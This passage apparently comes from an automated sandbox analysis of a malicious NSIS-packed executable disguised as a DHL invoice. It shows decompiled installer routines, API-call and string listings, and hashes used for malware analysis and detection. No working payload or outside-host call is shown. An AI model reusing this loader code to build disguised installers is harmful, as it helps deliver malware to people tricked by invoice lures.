						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405BA5(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x0040397a
0x00403983
0x0040398a
0x0040398c
0x004039a0
0x004039b2
0x004039bb
0x004039c4
0x004039cb
0x004039d0
0x004039d7
0x004039ea
0x004039ea
0x004039f5
0x0040398e
0x0040398e
0x00403999
0x00403999
0x004039fa
0x00403a04
0x00403a0d
0x00403a12
0x00403a23
0x00403ab5
0x00403abd
0x00403ac6
0x00403ac6
0x00403adc
0x00403ae2
0x00403af0
0x00403b71
0x00403b79
0x00403b83
0x00403b88
0x00403b8e
0x00403c18
0x00403c1d
0x00403c1f
0x00403c3b
0x00000000
0x00403c3b
0x00403c21
0x00403c27
0x00403c2f
0x00403c2f
0x00000000
0x00403c27
0x00403b9c
0x00403ba7
0x00403bac
0x00403bae
0x00403bb5
0x00403bb5
0x00403bc0
0x00403bc8
0x00403bca
0x00403bcc
0x00403bd5
0x00403bd8
0x00403bde
0x00403bde
0x00403bfd
0x00403c0e
0x00000000
0x00403c13
0x00403b7b
0x00403b7d
0x00000000
0x00403af2
0x00403af2
0x00403afe
0x00403b08
0x00403b0e
0x00403b13
0x00403b22
0x00403c40
0x00403c40
0x00000000
0x00403c40
0x00403b31
0x00403b6c
0x00000000
0x00403b6c
0x00403a29
0x00403a29
0x00403a2c
0x00403a2e
0x00000000
0x00000000
0x00403a3c
0x00403a4e
0x00403a53
0x00403a5c
0x00000000
0x00000000
0x00403a62
0x00403a64
0x00403a71
0x00403a71
0x00403a7a
0x00403a80
0x00403aa8
0x00403ab0
0x00000000
0x00403a92
0x00403a93
0x00403a9c
0x00403aa2
0x00403aa3
0x00000000
0x00403aa3
0x00403a9e
0x00403aa0
0x00000000
0x00000000
0x00000000
0x00403aa0
0x00403a80

APIs

Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B

GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,75F73420,"C:\Users\user\Desktop\DHL-INVOICE-MBV.exe",00000000), ref: 0040398E

Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8

lstrcatW.KERNEL32(1033,004236E8), ref: 004039F5
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A75
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
GetFileAttributesW.KERNEL32(Call), ref: 00403A93
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical), ref: 00403ADC
RegisterClassW.USER32(004291A0), ref: 00403B19
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
ShowWindow.USER32(00000005,00000000), ref: 00403B9C
GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
RegisterClassW.USER32(004291A0), ref: 00403BDE
DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403980
RichEdit20W, xrefs: 00403BC0, 00403BC6
_Nb, xrefs: 00403AF8, 00403B60
1033, xrefs: 00403994, 004039F0
.exe, xrefs: 00403A82
Call, xrefs: 00403A3C, 00403A45, 00403A53, 00403AA2, 00403AA8
RichEd20, xrefs: 00403BA2
.DEFAULT\Control Panel\International, xrefs: 004039E0
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical, xrefs: 00403A04, 00403A0C, 00403AAF, 00403AB5, 00403AC5
RichEd32, xrefs: 00403BB0
"C:\Users\user\Desktop\DHL-INVOICE-MBV.exe", xrefs: 00403978
RichEdit, xrefs: 00403BCF
6B, xrefs: 004039A0
Control Panel\Desktop\ResourceLocale, xrefs: 004039A8

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\DHL-INVOICE-MBV.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
API String ID: 606308-1637949484
Opcode ID: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
Instruction ID: ac693f2390e271b0591ead3bca04d252cd9040af8bb9d400f005d771bc7483c2
Opcode Fuzzy Hash: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
Instruction Fuzzy Hash: 0D61B770244600BFE630AF269D46F273A6CEB44B45F40057EF985B62E2DB7D5911CA2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402EDD Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00402EDD(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\Desktop\\DHL-INVOICE-MBV.exe";
				 *0x42a210 = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\DHL-INVOICE-MBV.exe", 0x400);
				_t89 = E00405D7A(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\Arthur\\Desktop";
				E00406284(L"C:\\Users\\Arthur\\Desktop", _t91);
				E00406284(0x439000, E00405BA5(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x418ea4 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E79(1);
					__eflags =  *0x42a218 - _t82;
					if( *0x42a218 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E00403311( *0x42a218 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00403116(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42a214 = _t94;
							 *0x42a21c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42a220 =  *0x42a220 + 1;
								__eflags =  *0x42a220;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405D35(0x42a240, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403311( *0x40ce98);
					_t65 = E004032FB( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42a218) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004032FB(0x418ea8, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402E79(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a218;
						if( *0x42a218 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E79(0);
							}
							goto L20;
						}
						E00405D35( &_v44, 0x418ea8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x40ce98; // 0x43d4f
						 *0x42a2c0 =  *0x42a2c0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42a218 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a2dc
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x418ea4; // 0x43d53
						if(__eflags < 0) {
							_v12 = E00406751(_v12, 0x418ea8, _t90);
						}
						 *0x40ce98 =  *0x40ce98 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402ee5
0x00402ee8
0x00402eeb
0x00402eee
0x00402ef4
0x00402f05
0x00402f0a
0x00402f1d
0x00402f22
0x00402f25
0x00402f2b
0x00000000
0x00402f2d
0x00402f38
0x00402f3e
0x00402f4f
0x00402f56
0x00402f5c
0x00402f5e
0x00402f63
0x00402f65
0x00403052
0x00403054
0x00403059
0x00403060
0x00000000
0x00000000
0x00403062
0x00403065
0x00403089
0x0040308e
0x00403094
0x0040309f
0x004030a4
0x004030a7
0x004030a8
0x004030a9
0x004030ab
0x004030b0
0x004030b3
0x004030c6
0x004030ca
0x004030d2
0x004030d7
0x004030d9
0x004030d9
0x004030d9
0x004030e1
0x004030e1
0x004030e4
0x004030e5
0x004030e5
0x004030e8
0x004030ea
0x004030ea
0x004030ea
0x004030f4
0x004030fa
0x00403108
0x0040310d
0x00000000
0x0040310d
0x00000000
0x004030b3
0x0040306d
0x00403078
0x0040307d
0x0040307f
0x00000000
0x00000000
0x00403084
0x00403087
0x00000000
0x00000000
0x00000000
0x00402f6b
0x00402f70
0x00402f75
0x00402f79
0x00402f80
0x00402f85
0x00402f87
0x00402f89
0x00402f89
0x00402f8d
0x00402f92
0x00402f94
0x004030be
0x004030b5
0x00000000
0x004030b5
0x00402f9a
0x00402fa1
0x0040301d
0x00403021
0x00403025
0x0040302a
0x00000000
0x00403021
0x00402faa
0x00402faf
0x00402fb2
0x00402fb7
0x00000000
0x00000000
0x00402fb9
0x00402fc0
0x00000000
0x00000000
0x00402fc2
0x00402fc9
0x00000000
0x00000000
0x00402fcb
0x00402fd2
0x00000000
0x00000000
0x00402fd4
0x00402fdb
0x00000000
0x00000000
0x00402fdd
0x00402fe3
0x00402fec
0x00402ff2
0x00402ff5
0x00402ff7
0x00402ffd
0x00000000
0x00000000
0x00403003
0x00403007
0x0040300f
0x0040300f
0x00403012
0x00403012
0x00403015
0x00403017
0x00403019
0x00403019
0x00000000
0x00403017
0x00403009
0x0040300d
0x00000000
0x00000000
0x00000000
0x0040302b
0x0040302b
0x00403031
0x0040303d
0x0040303d
0x00403040
0x00403046
0x00403048
0x00403048
0x00403050
0x00403050
0x00000000
0x00403050

APIs

GetTickCount.KERNEL32 ref: 00402EEE
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL-INVOICE-MBV.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A

Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\DHL-INVOICE-MBV.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL-INVOICE-MBV.exe,C:\Users\user\Desktop\DHL-INVOICE-MBV.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00402EE7
Error launching installer, xrefs: 00402F2D
C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
soft, xrefs: 00402FCB
"C:\Users\user\Desktop\DHL-INVOICE-MBV.exe", xrefs: 00402EDD
Null, xrefs: 00402FD4
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
Inst, xrefs: 00402FC2
C:\Users\user\Desktop\DHL-INVOICE-MBV.exe, xrefs: 00402EF4, 00402F03, 00402F17, 00402F37

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\DHL-INVOICE-MBV.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL-INVOICE-MBV.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-2540583324
Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD

Uniqueness

Uniqueness Score: -1.00%

Function 004062A6 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E004062A6(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t43;
				WCHAR* _t44;
				signed char _t46;
				signed int _t47;
				signed int _t48;
				short _t58;
				short _t60;
				short _t62;
				void* _t70;
				signed int _t76;
				void* _t82;
				signed char _t83;
				short _t86;
				signed int _t96;
				void* _t102;
				short _t103;
				signed int _t106;
				signed int _t108;
				void* _t109;
				WCHAR* _t110;
				void* _t112;

				_t109 = __esi;
				_t102 = __edi;
				_t70 = __ebx;
				_t43 = _a8;
				if(_t43 < 0) {
					_t43 =  *( *0x4291dc - 4 + _t43 * 4);
				}
				_push(_t70);
				_push(_t109);
				_push(_t102);
				_t96 =  *0x42a258 + _t43 * 2;
				_t44 = 0x4281a0;
				_t110 = 0x4281a0;
				if(_a4 >= 0x4281a0 && _a4 - 0x4281a0 >> 1 < 0x800) {
					_t110 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t103 =  *_t96;
					if(_t103 == 0) {
						break;
					}
					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t82 = 2;
					_t96 = _t96 + _t82;
					__eflags = _t103 - 4;
					_a8 = _t96;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t110 = _t103;
							_t110 = _t110 + _t82;
							__eflags = _t110;
						} else {
							 *_t110 =  *_t96;
							_t110 = _t110 + _t82;
							_t96 = _t96 + _t82;
						}
						continue;
					}
					_t83 =  *((intOrPtr*)(_t96 + 1));
					_t46 =  *_t96;
					_t47 = _t46 & 0x000000ff;
					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t47 | 0x00008000;
					_v24 = _t47;
					_t76 = _t83 & 0x000000ff;
					_v16 = _t76;
					__eflags = _t103 - 2;
					_v20 = _t76 | 0x00008000;
					if(_t103 != 2) {
						__eflags = _t103 - 3;
						if(_t103 != 3) {
							__eflags = _t103 - 1;
							if(_t103 == 1) {
								__eflags = (_t47 | 0xffffffff) - _v8;
								E004062A6(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
							}
							L43:
							_t48 = lstrlenW(_t110);
							_t96 = _a8;
							_t110 =  &(_t110[_t48]);
							_t44 = 0x4281a0;
							continue;
						}
						_t106 = _v8;
						__eflags = _t106 - 0x1d;
						if(_t106 != 0x1d) {
							__eflags = (_t106 << 0xb) + 0x42b000;
							E00406284(_t110, (_t106 << 0xb) + 0x42b000);
						} else {
							E004061CB(_t110,  *0x42a208);
						}
						__eflags = _t106 + 0xffffffeb - 7;
						if(_t106 + 0xffffffeb < 7) {
							L34:
							E00406518(_t110);
						}
						goto L43;
					}
					_t86 =  *0x42a20c;
					__eflags = _t86;
					_t108 = 2;
					if(_t86 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x42a2a4;
						if( *0x42a2a4 != 0) {
							_t108 = 4;
						}
						__eflags = _t47;
						if(__eflags >= 0) {
							__eflags = _t47 - 0x25;
							if(_t47 != 0x25) {
								__eflags = _t47 - 0x24;
								if(_t47 == 0x24) {
									GetWindowsDirectoryW(_t110, 0x400);
									_t108 = 0;
								}
								while(1) {
									__eflags = _t108;
									if(_t108 == 0) {
										goto L30;
									}
									_t58 =  *0x42a204;
									_t108 = _t108 - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										L26:
										_t60 = SHGetSpecialFolderLocation( *0x42a208,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											L28:
											 *_t110 =  *_t110 & 0x00000000;
											__eflags =  *_t110;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t110);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t62 =  *_t58( *0x42a208,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
									__eflags = _t62;
									if(_t62 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t110, 0x400);
							goto L30;
						} else {
							E00406152( *0x42a258, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a258 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040);
							__eflags =  *_t110;
							if( *_t110 != 0) {
								L32:
								__eflags = _t76 - 0x1a;
								if(_t76 == 0x1a) {
									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L34;
							}
							E004062A6(_t76, _t108, _t110, _t110, _t76);
							L30:
							__eflags =  *_t110;
							if( *_t110 == 0) {
								goto L34;
							}
							_t76 = _v16;
							goto L32;
						}
					}
					__eflags = _t86 - 0x5a04;
					if(_t86 == 0x5a04) {
						goto L13;
					}
					__eflags = _t76 - 0x23;
					if(_t76 == 0x23) {
						goto L13;
					}
					__eflags = _t76 - 0x2e;
					if(_t76 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t110 =  *_t110 & 0x00000000;
				if(_a4 == 0) {
					return _t44;
				}
				return E00406284(_a4, _t44);
			}

0x004062a6
0x004062a6
0x004062a6
0x004062ac
0x004062b1
0x004062c2
0x004062c2
0x004062ca
0x004062cb
0x004062cc
0x004062cd
0x004062d0
0x004062d8
0x004062da
0x004062f3
0x004062f6
0x004062f6
0x004064f2
0x004064f2
0x004064f8
0x00000000
0x00000000
0x00406306
0x0040630c
0x00000000
0x00000000
0x00406314
0x00406315
0x00406317
0x0040631b
0x0040631e
0x004064df
0x004064ed
0x004064f0
0x004064f0
0x004064e1
0x004064e4
0x004064e7
0x004064e9
0x004064e9
0x00000000
0x004064df
0x00406324
0x00406327
0x00406336
0x0040633d
0x00406347
0x0040634b
0x0040634e
0x00406351
0x00406356
0x0040635b
0x0040635f
0x00406362
0x00406482
0x00406486
0x004064b9
0x004064bd
0x004064c2
0x004064c7
0x004064c7
0x004064cc
0x004064cd
0x004064d2
0x004064d5
0x004064d8
0x00000000
0x004064d8
0x00406488
0x0040648b
0x0040648e
0x004064a3
0x004064aa
0x00406490
0x00406497
0x00406497
0x004064b2
0x004064b5
0x0040647a
0x0040647b
0x0040647b
0x00000000
0x004064b5
0x00406368
0x00406370
0x00406372
0x00406373
0x0040638c
0x0040638c
0x00406393
0x00406393
0x0040639a
0x0040639e
0x0040639e
0x0040639f
0x004063a1
0x004063dc
0x004063df
0x004063ef
0x004063f2
0x004063fa
0x00406400
0x00406400
0x0040645d
0x0040645d
0x0040645f
0x00000000
0x00000000
0x00406404
0x0040640b
0x0040640c
0x0040640e
0x00406428
0x00406436
0x0040643c
0x0040643e
0x00406459
0x00406459
0x00406459
0x00000000
0x00406459
0x00406444
0x0040644f
0x00406455
0x00406457
0x00000000
0x00000000
0x00000000
0x00406457
0x00406410
0x00406413
0x00000000
0x00000000
0x00406422
0x00406424
0x00406426
0x00000000
0x00000000
0x00000000
0x00406426
0x00000000
0x0040645d
0x004063e7
0x00000000
0x004063a3
0x004063c1
0x004063c6
0x004063ca
0x0040646a
0x0040646a
0x0040646d
0x00406475
0x00406475
0x00000000
0x0040646d
0x004063d2
0x00406461
0x00406461
0x00406465
0x00000000
0x00000000
0x00406467
0x00000000
0x00406467
0x004063a1
0x00406375
0x0040637a
0x00000000
0x00000000
0x0040637c
0x0040637f
0x00000000
0x00000000
0x00406381
0x00406384
0x00000000
0x00406386
0x00406386
0x00000000
0x00406386
0x00406384
0x004064fe
0x00406509
0x00406515
0x00406515
0x00000000

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E7
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,00000000), ref: 004063FA
SHGetSpecialFolderLocation.SHELL32(00405323,00410EA0,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,00000000), ref: 00406436
SHGetPathFromIDListW.SHELL32(00410EA0,Call), ref: 00406444
CoTaskMemFree.OLE32(00410EA0), ref: 0040644F
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,00000000), ref: 004064CD

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll, xrefs: 004062CB
Software\Microsoft\Windows\CurrentVersion, xrefs: 004063B7
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040646F
Call, xrefs: 004062D0, 004063AB, 004063B2, 004063B6, 004063D0, 004063D1, 004063E6, 004063F9, 00406415, 00406440, 00406474, 0040647A, 00406496, 004064A9, 004064C6, 004064CC, 004064D8, 0040650B

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-4219498200
Opcode ID: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
Instruction ID: 605843c2509a57f6f3c23207e2b9262681d5cb504286618bc70e882f3b2b38d7
Opcode Fuzzy Hash: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
Instruction Fuzzy Hash: 2C611171A00215ABDF209F64CC40AAE37A5AF54314F22813FE947BB2D0D77D5AA2CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __edi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t81;
				void* _t82;
				WCHAR* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402C41(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
				_t35 = E00405BD0( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t84 = L"Call";
				if(_t35 == 0) {
